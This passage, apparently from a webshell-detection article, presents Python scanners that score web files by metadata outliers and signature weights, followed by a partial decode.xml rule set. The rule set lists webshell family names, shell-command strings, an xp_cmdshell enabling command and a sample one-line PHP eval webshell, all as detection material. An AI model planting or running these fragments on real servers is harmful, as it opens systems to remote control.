2. Whether the file's owner differs from that of the other files in the directory
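A way to turn those two checks into a score, added here as an example rather than the page's own scanner. Timestamps are compared with the directory median using a MAD-based robust z-score, so one freshly dropped file cannot drag the directory's "normal" time towards itself; the owner is compared with the directory's majority owner. The weights, the z-score cut-off, the spread floor and the sample entries are assumptions made for the example.

```python
"""Directory-sibling metadata scoring (added example, not from the page)."""
import os
import statistics
from collections import Counter

W_MTIME, W_CTIME, W_OWNER = 30, 20, 30   # assumed weights added to the file's score
Z_LIMIT = 3.0                            # robust z-score beyond which a timestamp is an outlier
MIN_SCALE = 3600.0                       # floor on the spread (seconds): a tree deployed in one
                                         # go has a MAD near zero, which would flag everything


def collect(directory):
    """(name, mtime, ctime, uid) for every regular file directly inside `directory`."""
    out = []
    for e in os.scandir(directory):
        if e.is_file(follow_symlinks=False):
            st = e.stat(follow_symlinks=False)
            out.append((e.name, st.st_mtime, st.st_ctime, st.st_uid))
    return out


def robust_z(value, values):
    """|value - median| divided by the MAD-based spread of `values`."""
    med = statistics.median(values)
    mad = statistics.median([abs(v - med) for v in values])
    scale = max(1.4826 * mad, MIN_SCALE)
    return abs(value - med) / scale


def metadata_scores(entries):
    """Map each file name to the metadata weight it earns relative to its siblings."""
    if len(entries) < 3:                 # too few siblings to define "normal"
        return {name: 0 for name, *_ in entries}
    mtimes = [e[1] for e in entries]
    ctimes = [e[2] for e in entries]
    majority_uid = Counter(e[3] for e in entries).most_common(1)[0][0]
    scores = {}
    for name, mtime, ctime, uid in entries:
        s = 0
        if robust_z(mtime, mtimes) > Z_LIMIT:
            s += W_MTIME
        # mtime is trivially forged (touch -r), ctime cannot be set from user space,
        # so a ctime outlier survives the usual timestamp forgery and is scored separately
        if robust_z(ctime, ctimes) > Z_LIMIT:
            s += W_CTIME
        if uid != majority_uid:
            s += W_OWNER
        scores[name] = s
    return scores


def scan_directory(directory):
    """Convenience wrapper over real files; returns only the files that earned a score."""
    return {n: s for n, s in metadata_scores(collect(directory)).items() if s}


# constructed sample: nine files deployed within minutes of each other owned by uid 33,
# plus one file written 90 days later by a different uid
BASE = 1_600_000_000.0
SAMPLE = [("index.php", BASE, BASE, 33)]
SAMPLE += [("page%d.php" % i, BASE + 60 * i, BASE + 60 * i, 33) for i in range(1, 9)]
SAMPLE.append(("shell.php", BASE + 90 * 86400, BASE + 90 * 86400, 0))

if __name__ == "__main__":
    for name, score in sorted(metadata_scores(SAMPLE).items()):
        print("%-12s %3d" % (name, score))
```

On a real tree, run scan_directory() per directory rather than over the whole document root, since deploy times legitimately differ between, say, a theme directory and an upload directory.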
10. Coarse- and fine-grained webshell detection split between client and server
0x1: Client-side detection: sensing
The client applies coarse-grained rules. Its goal is coverage of suspect files: at an acceptable false-positive rate (normal files flagged as suspected webshells), raise the hit rate (malicious webshells flagged as suspected webshells) as far as possible. The client's dragnet scan consists of the following steps:
1. Filter for the file extensions we care about
1) PHP webshell: 1.1) .php 1.2) .php4 1.3) .php5 1.4) .inc
2) ASP webshell: 2.1) .asp 2.2) .asa 2.3) .cer 2.4) .cdx 2.5) .aspx
3) JSP webshell: 3.1) .jsp
4) Script webshell: 4.1) .pl 4.2) .py 4.3) .sh
5) Zombie webshell, a file name beginning with a Windows reserved device name, which ordinary Win32 file operations cannot open or delete: 5.1) aux. 5.2) prn. 5.3) con. 5.4) nul. 5.5) com1. 5.6) com2. 5.7) com3. 5.8) com4. 5.9) com5. 5.10) com6. 5.11) com7. 5.12) com8. 5.13) com9. 5.14) lpt1. 5.15) lpt2. 5.16) lpt3. 5.17) lpt4. 5.18) lpt5. 5.19) lpt6. 5.20) lpt7. 5.21) lpt8. 5.22) lpt9.
2. Apply the [string signature, regex] rules for each extension class, compute the weighted score of the rules that match, and report suspect files whose score exceeds 70
3. If a file differs greatly from the other files in its directory, weight its score up (raising the probability that it is judged to be a webshell)
4. Whether the file's owner differs from that of the other files in the directory
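A minimal client-side scanner for rules in the decode.xml schema that follows, added as an example and not the page's own scanner. It reads the literal <ITEM><STR>/<NUM> signatures and the <PHPRULE> regular expressions of each language block, maps them to the block's <EXT> list, and scores every file whose extension is covered. Two things the page leaves open are assumptions here: matching rule weights are summed and capped at 100, and a regular-expression hit (whose items carry no <NUM>) counts 80. Literal matching is a case-sensitive substring test, which is why the page's rule set lists both "VBScript.Encode" and "VBScript.encode". The rule fragment and the sample files are constructed; the INFORMATION, SEO and ADDITIONALRULL sections are ignored.

```python
"""Scanner for decode.xml-style rules (added example, not the page's own code)."""
import re
import xml.etree.ElementTree as ET

REGEX_WEIGHT = 80          # assumption: <PHPRULE>/<ASPRULE> items carry no <NUM>
REPORT_THRESHOLD = 70      # from the text: report files scoring above 70

# constructed fragment in the page's schema; the literals and the first regex are
# taken from the page's PHP block, the weights are the page's
RULES_XML = r"""<?xml version="1.0"?>
<LEX>
  <Isparser>0</Isparser>
  <PHP>
    <WEBSHELL>
      <ITEM><STR>eval(</STR><NUM>10</NUM></ITEM>
      <ITEM><STR>base64_decode(</STR><NUM>10</NUM></ITEM>
      <ITEM><STR>eval(base64_decode(</STR><NUM>80</NUM></ITEM>
      <ITEM><STR>preg_replace(</STR><NUM>30</NUM></ITEM>
      <PHPRULE>
        <ITEM>[^\w]eval\((\$_GET|\$_POST)\[.{0,34}\]\)</ITEM>
        <ITEM>(0o){20}</ITEM>
      </PHPRULE>
    </WEBSHELL>
    <EXT>
      <ITEM>.php</ITEM>
      <ITEM>.php4</ITEM>
      <ITEM>.php5</ITEM>
      <ITEM>.inc</ITEM>
    </EXT>
  </PHP>
</LEX>
"""


def load_rules(xml_text):
    """{extension: (literal_rules, compiled_regexes)} from one decode.xml document."""
    rules = {}
    for lang in ET.fromstring(xml_text):            # <ASP>, <PHP>, <JAVA>, <SCRIPT>, ...
        webshell, ext_block = lang.find("WEBSHELL"), lang.find("EXT")
        if webshell is None or ext_block is None:
            continue                                 # e.g. <Isparser>, <Version>
        literals = []
        for item in webshell.findall("ITEM"):
            s, n = item.find("STR"), item.find("NUM")
            if s is not None and n is not None and s.text:
                literals.append((s.text, int(n.text)))
        regexes = []
        for rule in webshell.iter():                 # PHPRULE / ASPRULE / JSPRULE
            if rule.tag.endswith("RULE"):
                regexes += [re.compile(i.text) for i in rule.findall("ITEM") if i.text]
        for ext in ext_block.findall("ITEM"):
            rules[ext.text.strip().lower()] = (literals, regexes)
    return rules


def score_file(name, content, rules):
    """Summed weight of every rule that hits, capped at 100; 0 when the extension is not covered."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext not in rules:
        return 0
    literals, regexes = rules[ext]
    score = sum(weight for needle, weight in literals if needle in content)
    score += sum(REGEX_WEIGHT for rx in regexes if rx.search(content))
    return min(score, 100)


def scan(files, rules):
    """{name: score} for the files that exceed the report threshold."""
    hits = {}
    for name, content in files.items():
        s = score_file(name, content, rules)
        if s > REPORT_THRESHOLD:
            hits[name] = s
    return hits


SAMPLE_FILES = {   # constructed file bodies
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
    "cmd.php": "<?php @eval($_POST['cmd']); ?>",
    "img.php": "<?php eval(base64_decode('ZWNobyAxOw==')); ?>",
    "notes.txt": "eval(base64_decode(",      # extension not covered: never scored
}
RULES = load_rules(RULES_XML)

if __name__ == "__main__":
    for name, body in SAMPLE_FILES.items():
        print("%-10s %3d" % (name, score_file(name, body, RULES)))
    print("report:", scan(SAMPLE_FILES, RULES))
```

cmd.php scores 90 (the "eval(" literal plus the regex hit) and img.php hits the 100 cap, while the harmless index.php scores 0. Note that the one-liner `@eval($_POST['cmd'])` is caught only by the regex: the literal "eval(" alone is worth 10, which is the coarse-grained trade-off the text describes, cheap literals for coverage and a few regexes for the classic shapes.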
Client-side coarse-grained detection rules
decode.xml
<?xml version="1.0"?> <LEX> <Isparser>0</Isparser> <Version>2015-01-08</Version> <ASP> <WEBSHELL> <ITEM><STR>/mb/js.js"></script></STR><NUM>30</NUM></ITEM> <ITEM><STR>/mb/2.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>/mb/3.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>server.scripttimeout</STR><NUM>70</NUM></ITEM> <ITEM><STR>Branch_directory_13=getCode(Rand(3,5))</STR><NUM>70</NUM></ITEM> <ITEM><STR>Dim XBCode</STR><NUM>20</NUM></ITEM> <ITEM><STR>(XBCode)</STR><NUM>50</NUM></ITEM> <ITEM><STR>gif87a</STR><NUM>70</NUM></ITEM> <ITEM><STR>Then Execute(Session("lcx"</STR><NUM>70</NUM></ITEM> <ITEM><STR>Response.Write(eval(Request.Item</STR><NUM>70</NUM></ITEM> <ITEM><STR>GetObject("IIS://127.0.0.1/W3SVC/"</STR><NUM>40</NUM></ITEM> <ITEM><STR>Marcos</STR><NUM>70</NUM></ITEM> <ITEM><STR>chopper</STR><NUM>70</NUM></ITEM> <ITEM><STR>HYTop.mdb</STR><NUM>70</NUM></ITEM> <ITEM><STR>C:\\Progra~1</STR><NUM>10</NUM></ITEM> <ITEM><STR>Servu</STR><NUM>10</NUM></ITEM> <ITEM><STR>LyfUpload.UploadFile</STR><NUM>10</NUM></ITEM> <ITEM><STR>cmd.exe</STR><NUM>10</NUM></ITEM> <ITEM><STR>ServerVariables("SERVER_SOFTWARE")</STR><NUM>5</NUM></ITEM> <ITEM><STR>Environment.GetLogicalDrives</STR><NUM>20</NUM></ITEM> <ITEM><STR>Evilspy</STR><NUM>80</NUM></ITEM> <ITEM><STR>GetObject("WinNT://</STR><NUM>50</NUM></ITEM> <ITEM><STR>webshell</STR><NUM>40</NUM></ITEM> <ITEM><STR>WebAdmin2Y.x.y("add6bb58e139be10")</STR><NUM>70</NUM></ITEM> <ITEM><STR>GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>lake2</STR><NUM>30</NUM></ITEM> <ITEM><STR>.GetFolder(</STR><NUM>10</NUM></ITEM> <ITEM><STR>Password</STR><NUM>10</NUM></ITEM> <ITEM><STR>UserPass</STR><NUM>10</NUM></ITEM> <ITEM><STR>VBScript.Encode</STR><NUM>70</NUM></ITEM> <ITEM><STR>VBScript.encode</STR><NUM>70</NUM></ITEM> <ITEM><STR>.CreateTextFile</STR><NUM>20</NUM></ITEM> <ITEM><STR>ipconfig -all</STR><NUM>30</NUM></ITEM> <ITEM><STR>kj021320</STR><NUM>70</NUM></ITEM> <ITEM><STR>unhonker.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>xiaf.info</STR><NUM>70</NUM></ITEM> 
<ITEM><STR>22dm.net</STR><NUM>70</NUM></ITEM> <ITEM><STR>cmd.exe /c</STR><NUM>50</NUM></ITEM> <ITEM><STR>RegEdit.exe /e</STR><NUM>50</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>30</NUM></ITEM> <ITEM><STR>net user</STR><NUM>30</NUM></ITEM> <ITEM><STR>string jksessionpass</STR><NUM>30</NUM></ITEM> <ITEM><STR>ASPYDrvsInfo</STR><NUM>70</NUM></ITEM> <ITEM><STR>.CopyFolder</STR><NUM>5</NUM></ITEM> <ITEM><STR>.deletefile</STR><NUM>10</NUM></ITEM> <ITEM><STR>.ComputerName</STR><NUM>10</NUM></ITEM> <ITEM><STR>.CopyFile</STR><NUM>5</NUM></ITEM> <ITEM><STR>LocalAdministrator</STR><NUM>10</NUM></ITEM> <ITEM><STR>Serv-U</STR><NUM>20</NUM></ITEM> <ITEM><STR>System.Environment.SystemDirectory</STR><NUM>30</NUM></ITEM> <ITEM><STR>System.Net.Sockets</STR><NUM>10</NUM></ITEM> <ITEM><STR>System.Diagnostics</STR><NUM>10</NUM></ITEM> <ITEM><STR>System.DirectoryServices</STR><NUM>10</NUM></ITEM> <ITEM><STR>System.ServiceProcess</STR><NUM>10</NUM></ITEM> <ITEM><STR>new Socket(</STR><NUM>10</NUM></ITEM> <ITEM><STR>wscript.shell</STR><NUM>20</NUM></ITEM> <ITEM><STR>Runtime.getRuntime(</STR><NUM>20</NUM></ITEM> <ITEM><STR>xp_cmdshell</STR><NUM>20</NUM></ITEM> <ITEM><STR>Microsoft.XMLHTTP</STR><NUM>5</NUM></ITEM> <ITEM><STR>System.Reflection.Assembly.Load(Request.BinaryRead</STR><NUM>20</NUM></ITEM> <ITEM><STR>WScript.Shell</STR><NUM>20</NUM></ITEM> <ITEM><STR>FileOutputStream</STR><NUM>10</NUM></ITEM> <ITEM><STR>72C24DD5-D70A-438B-8A42-98424B88AFB8</STR><NUM>40</NUM></ITEM> <ITEM><STR>F935DC22-1CF0-11D0-ADB9-00C04FD58A0B</STR><NUM>30</NUM></ITEM> <ITEM><STR>13709620-C279-11CE-A49E-444553540000</STR><NUM>30</NUM></ITEM> <ITEM><STR>093FF809-1EA0-4079-9525-9614C3504B74</STR><NUM>20</NUM></ITEM> <ITEM><STR>F935DC26-1CF0-11D0-ADB9-00C04FD58A0B</STR><NUM>20</NUM></ITEM> <ITEM><STR>0D43FE01-F093-11CF-8940-00A0C9054228</STR><NUM>20</NUM></ITEM> <ITEM><STR>Scripting.FileSystemObject</STR><NUM>10</NUM></ITEM> <ITEM><STR>ADODB.Stream</STR><NUM>10</NUM></ITEM> 
<ITEM><STR>BackDoor</STR><NUM>20</NUM></ITEM> <ITEM><STR>command.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>uploadvirus</STR><NUM>70</NUM></ITEM> <ITEM><STR>s;xvj4kjmx}4LkYMb@#@&?4kUlU6(L/D.P{PI2sl1+v?4kjC</STR><NUM>70</NUM></ITEM> <ITEM><STR>hack.cctve.cn</STR><NUM>70</NUM></ITEM> <ITEM><STR>fuckanquangoutezheng</STR><NUM>80</NUM></ITEM> <ITEM><STR>OleDbConnection(session("DBC")) instr(DB_CString.Text,":\")</STR><NUM>80</NUM></ITEM> <ITEM><STR>sk8t9hSDALYDYBi0HCaGRxSgH5KgABYDYBg4Q</STR><NUM>80</NUM></ITEM> <ITEM><STR>crypt_PRO="0mWm2/,5</STR><NUM>80</NUM></ITEM> <ITEM><STR>WICXlQa33rNDnBUKHvXcMsQmWDL4e</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[#@~^k0oAAA==@#@&D]kJ@!tYsV@*@!]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>$adminport=43958;</STR><NUM>80</NUM></ITEM> <ITEM><STR>SessionName="ASPXSpy";</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)]]></STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[-SETDOMAIN"&vbcrlf&"-Domain=cctv|0.0.0.0|43859|-1|1|0"]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>ShowFolder("C:\\RECYCLER</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[http://127.0.0.1:"&port&"/goldsun/upadmin/s1]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>Addxp_cmdshell(SQL2005)</STR><NUM>60</NUM></ITEM> <ITEM><STR>awen asp.net webshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>void cmdExe_Click(object sender, System.EventArgs e)</STR><NUM>80</NUM></ITEM> <ITEM><STR>AK-74 Security Team Web Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;\</STR><NUM>80</NUM></ITEM> <ITEM><STR>Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[Rp=Co&"?pw="&Server.URlEncode(Request("jl"))&"&ib="&Request("ib")]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>1902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B19</STR><NUM>80</NUM></ITEM> 
<ITEM><STR><![CDATA[s"&"cri"&"pting"&"."&"Fil"&"eSy"&"stemO"&"bject]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>spider,robot,Baidu,Google,360spider,sogou,soso</STR><NUM>60</NUM></ITEM> <ITEM><STR>googlebot|baiduspider|sogou|yahoo|soso</STR><NUM>60</NUM></ITEM> <ITEM><STR>,"baiduspider","yahoo! slurp","inktomi","msnbot","</STR><NUM>60</NUM></ITEM> <ITEM><STR>bfafsfef6f4f_ffdffeffcffoffdffef</STR><NUM>80</NUM></ITEM> <ITEM><STR>createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")</STR><NUM>80</NUM></ITEM> <ASPRULE> <ITEM>[^\w](Eval|eval|Execute|execute|Eval_r|ExecuteGlobal).{0,3}(UnEncode|request|Request|session|Request.Item|Request.form|Session)(\(|\[)[^\{\}]{0,22}\)</ITEM> </ASPRULE> </WEBSHELL> <INFORMATION> <ITEM><STR>new Socket(AddressFamily.InterNetwork, SocketTyp</STR><NUM>60</NUM></ITEM> <ITEM><STR>DDosAttack</STR><NUM>70</NUM></ITEM> <ITEM><STR>Attack_Get()</STR><NUM>10</NUM></ITEM> <ITEM><STR>Attack_Post()</STR><NUM>10</NUM></ITEM> <ASPRULE> <ITEM></ITEM> </ASPRULE> </INFORMATION> <SEO> <ITEM><STR>/mb/js.js"></script></STR><NUM>30</NUM></ITEM> <ITEM><STR>/mb/2.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>/mb/3.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>351031729</STR><NUM>70</NUM></ITEM> <ITEM><STR>tophack.net</STR><NUM>70</NUM></ITEM> <ASPRULE> <ITEM></ITEM> </ASPRULE> </SEO> <ADDITIONALRULL> <WEBSHELL> <ITEM> <STR>tseuqer lave</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>codepage=65000</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>"D","7","S","O","q","G","j","l","z","4","L","k","m","x","0","c","v"</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>97a103a101a110a116a61a114a101a113a117a101a115a116a46a115a10</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<%a=request("x")%>]]></STR> <NUM>70</NUM> </ITEM> </WEBSHELL> </ADDITIONALRULL> <EXT> <ITEM>.asp</ITEM> <ITEM>.asa</ITEM> <ITEM>.cer</ITEM> <ITEM>.cdx</ITEM> <ITEM>.aspx</ITEM> </EXT> <LIKEEXT> 
<ITEM><![CDATA[.asp;]]></ITEM> </LIKEEXT> <BEGINEXT> <ITEM>aux.</ITEM> <ITEM>prn.</ITEM> <ITEM>con.</ITEM> <ITEM>nul.</ITEM> <ITEM>com1.</ITEM> <ITEM>com2.</ITEM> <ITEM>com3.</ITEM> <ITEM>com4.</ITEM> <ITEM>com5.</ITEM> <ITEM>com6.</ITEM> <ITEM>com7.</ITEM> <ITEM>com8.</ITEM> <ITEM>com9.</ITEM> <ITEM>lpt1.</ITEM> <ITEM>lpt2.</ITEM> <ITEM>lpt3.</ITEM> <ITEM>lpt4.</ITEM> <ITEM>lpt5.</ITEM> <ITEM>lpt6.</ITEM> <ITEM>lpt7.</ITEM> <ITEM>lpt8.</ITEM> <ITEM>lpt9.</ITEM> </BEGINEXT> </ASP> <PHP> <WEBSHELL> <ITEM><STR>MCL090810</STR><NUM>80</NUM></ITEM> <ITEM><STR>www.mianshamuma.com</STR><NUM>80</NUM></ITEM> <ITEM><STR>preg_replace(</STR><NUM>30</NUM></ITEM> <ITEM><STR>$password</STR><NUM>10</NUM></ITEM> <ITEM><STR>'e'.'v'.'a'.'l'</STR><NUM>40</NUM></ITEM> <ITEM><STR>$_GET["woaini"]=="91ri"</STR><NUM>80</NUM></ITEM> <ITEM><STR>base64_decode(</STR><NUM>10</NUM></ITEM> <ITEM><STR>eval(</STR><NUM>10</NUM></ITEM> <ITEM><STR>exec(</STR><NUM>10</NUM></ITEM> <ITEM><STR>passthru(</STR><NUM>10</NUM></ITEM> <ITEM><STR>system(</STR><NUM>10</NUM></ITEM> <ITEM><STR>shell_exec(</STR><NUM>10</NUM></ITEM> <ITEM><STR>proc_open(</STR><NUM>10</NUM></ITEM> <ITEM><STR>pcntl_exec(</STR><NUM>10</NUM></ITEM> <ITEM><STR>into outfile</STR><NUM>20</NUM></ITEM> <ITEM><STR>load_file(</STR><NUM>20</NUM></ITEM> <ITEM><STR>.htaccess</STR><NUM>10</NUM></ITEM> <ITEM><STR>udfdll</STR><NUM>35</NUM></ITEM> <ITEM><STR>shellcode</STR><NUM>55</NUM></ITEM> <ITEM><STR>@popen(</STR><NUM>10</NUM></ITEM> <ITEM><STR>SetHandler application/x-httpd-php</STR><NUM>40</NUM></ITEM> <ITEM><STR>preg_replace($exif['Make'],$exif['Model'],'')</STR><NUM>80</NUM></ITEM> <ITEM><STR>oo0o0O0o00oOo0O0o0OoO</STR><NUM>80</NUM></ITEM> <ITEM><STR>Eval(base64_decode(file_get_contents(base64_decode</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(base64_decode(</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(gzinflate(str_rot13(base64_decode(</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(gzinflate(base64_decode(</STR><NUM>80</NUM></ITEM> 
<ITEM><STR>eval(gzuncompress(base64_decode(</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(str_rot13(</STR><NUM>80</NUM></ITEM> <ITEM><STR>TG9jYXRpb24</STR><NUM>79</NUM></ITEM> <ITEM><STR>base64_decode("4D5A90000300000004</STR><NUM>80</NUM></ITEM> <ITEM><STR>0x4d5a4b45524e454c33322e444c4c00004c6f61644c6962726172794</STR><NUM>80</NUM></ITEM> <ITEM><STR>langouster_udf.dll</STR><NUM>80</NUM></ITEM> <ITEM><STR>urldecode("%6E1%7A%62%2F%6D%615%5C</STR><NUM>80</NUM></ITEM> <ITEM><STR>$b33 = $_SERVER['DOCUMENT_ROOT']</STR><NUM>80</NUM></ITEM> <ITEM><STR>passthru($cmd)</STR><NUM>80</NUM></ITEM> <ITEM><STR>PHP Web Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>P.h.p.S.p.y</STR><NUM>80</NUM></ITEM> <ITEM><STR>PhpShell</STR><NUM>80</NUM></ITEM> <ITEM><STR>phpshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>w4ck1ng</STR><NUM>80</NUM></ITEM> <ITEM><STR>GIF89a</STR><NUM>80</NUM></ITEM> <ITEM><STR>PhpSpy</STR><NUM>80</NUM></ITEM> <ITEM><STR>_pass</STR><NUM>1</NUM></ITEM> <ITEM><STR>b374k</STR><NUM>79</NUM></ITEM> <ITEM><STR>milw0rm</STR><NUM>80</NUM></ITEM> <ITEM><STR>c80</STR><NUM>10</NUM></ITEM> <ITEM><STR>c100</STR><NUM>10</NUM></ITEM> <ITEM><STR>STUNSHELL</STR><NUM>80</NUM></ITEM> <ITEM><STR>FaTaLisTiCz</STR><NUM>80</NUM></ITEM> <ITEM><STR>Fx29SheLL</STR><NUM>80</NUM></ITEM> <ITEM><STR>backdoor</STR><NUM>20</NUM></ITEM> <ITEM><STR>back_connect</STR><NUM>60</NUM></ITEM> <ITEM><STR>r57</STR><NUM>10</NUM></ITEM> <ITEM><STR>Pr!v8</STR><NUM>80</NUM></ITEM> <ITEM><STR>webadmin</STR><NUM>10</NUM></ITEM> <ITEM><STR>PHPJackal</STR><NUM>80</NUM></ITEM> <ITEM><STR>C80madShell</STR><NUM>80</NUM></ITEM> <ITEM><STR>Ve_cENxShell</STR><NUM>80</NUM></ITEM> <ITEM><STR>ipconfig -all</STR><NUM>30</NUM></ITEM> <ITEM><STR>cmd.exe /c</STR><NUM>60</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>30</NUM></ITEM> <ITEM><STR>c80shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>NGHshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>Xgr0upVN</STR><NUM>80</NUM></ITEM> <ITEM><STR>call_user_func</STR><NUM>10</NUM></ITEM> 
<ITEM><STR>fsockopen</STR><NUM>20</NUM></ITEM> <ITEM><STR>tools88.com</STR><NUM>80</NUM></ITEM> <ITEM><STR>EgY_SpIdEr</STR><NUM>80</NUM></ITEM> <ITEM><STR>XXDD0S</STR><NUM>80</NUM></ITEM> <ITEM><STR>cha88.cn</STR><NUM>80</NUM></ITEM> <ITEM><STR>SECFORCE</STR><NUM>80</NUM></ITEM> <ITEM><STR>webshell</STR><NUM>40</NUM></ITEM> <ITEM><STR>auto_prepend_file</STR><NUM>10</NUM></ITEM> <ITEM><STR>Guama_</STR><NUM>80</NUM></ITEM> <ITEM><STR>Qingma_</STR><NUM>80</NUM></ITEM> <ITEM><STR>Antivirus_e</STR><NUM>80</NUM></ITEM> <ITEM><STR>Exec_g</STR><NUM>80</NUM></ITEM> <ITEM><STR>admin_spiderpass</STR><NUM>30</NUM></ITEM> <ITEM><STR>Shell (SPS-3.0)</STR><NUM>80</NUM></ITEM> <ITEM><STR>Spider PHP Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>SELECT cmd FROM a INTO DUMPFILE</STR><NUM>80</NUM></ITEM> <ITEM><STR>net start Terminal Services</STR><NUM>80</NUM></ITEM> <ITEM><STR>SELECT spider FROM Spider_Temp_Tab</STR><NUM>80</NUM></ITEM> <ITEM><STR>base64_decode($back_connect</STR><NUM>80</NUM></ITEM> <ITEM><STR>k1r4fsearch</STR><NUM>20</NUM></ITEM> <ITEM><STR>fuckanquangoutezheng</STR><NUM>80</NUM></ITEM> <ITEM><STR>PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw</STR><NUM>80</NUM></ITEM> <ITEM><STR>'\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a'</STR><NUM>80</NUM></ITEM> <ITEM><STR>3vWW7F6DsceDRT0dKtBX2rqX5Fh9tJDJpG71Byr5Th6TsbPulbB8Gmg3</STR><NUM>80</NUM></ITEM> <ITEM><STR>GUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lW</STR><NUM>80</NUM></ITEM> <ITEM><STR>$entry_line="HACKed by EntriKa";</STR><NUM>80</NUM></ITEM> <ITEM><STR>cont=replace(cont,"href=""","href=""?gov.cn.")</STR><NUM>80</NUM></ITEM> <ITEM><STR>$dez = $pwddir."/".$real;</STR><NUM>40</NUM></ITEM> <ITEM><STR>echo "FILE UPLOADED TO $dez"</STR><NUM>40</NUM></ITEM> <ITEM><STR>"R0lGODlhWAKWAOf</STR><NUM>80</NUM></ITEM> <ITEM><STR>$ydosya2 = fopen("$ydosya", 'w')</STR><NUM>40</NUM></ITEM> <ITEM><STR>fwrite($ydosya2, $kodlar)</STR><NUM>40</NUM></ITEM> <ITEM><STR>if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, 
$regs)) {</STR><NUM>80</NUM></ITEM> <ITEM><STR>cat /tmp/cmdtemp; rm /tmp/cmdtemp</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value']]></STR><NUM>80</NUM></ITEM> <ITEM><STR>$pwdump2="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ</STR><NUM>80</NUM></ITEM> <ITEM><STR>MyShell: can't change directory.\n$work_dir</STR><NUM>80</NUM></ITEM> <ITEM><STR>if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut)</STR><NUM>80</NUM></ITEM> <ITEM><STR>$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));</STR><NUM>80</NUM></ITEM> <ITEM><STR>if(file_exists("c:\\windows\\system32\\"))$dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"</STR><NUM>80</NUM></ITEM> <ITEM><STR>WWW.XXDDOS.COM</STR><NUM>60</NUM></ITEM> <ITEM><STR>$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>JCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5P</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>$liz0zim=shell_exec($_POST[liz0])</STR><NUM>80</NUM></ITEM> <ITEM><STR>dHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAA</STR><NUM>80</NUM></ITEM> <ITEM><STR>744zdMGn59wNZsz05tcH40pO/GcCgDzJj+e</STR><NUM>80</NUM></ITEM> <ITEM><STR>((!isset($key))?($key=implode('`, `',array_keys($line))):null);</STR><NUM>80</NUM></ITEM> <ITEM><STR>+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+</STR><NUM>80</NUM></ITEM> <ITEM><STR>;@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();</STR><NUM>80</NUM></ITEM> <ITEM><STR>hYSMtmdpZNpy8ZY6hBlJJxBWSVC5FiGoIRJzgYAXAW</STR><NUM>80</NUM></ITEM> <ITEM><STR>Calistirmak istediginiz komutu buraya girin</STR><NUM>80</NUM></ITEM> 
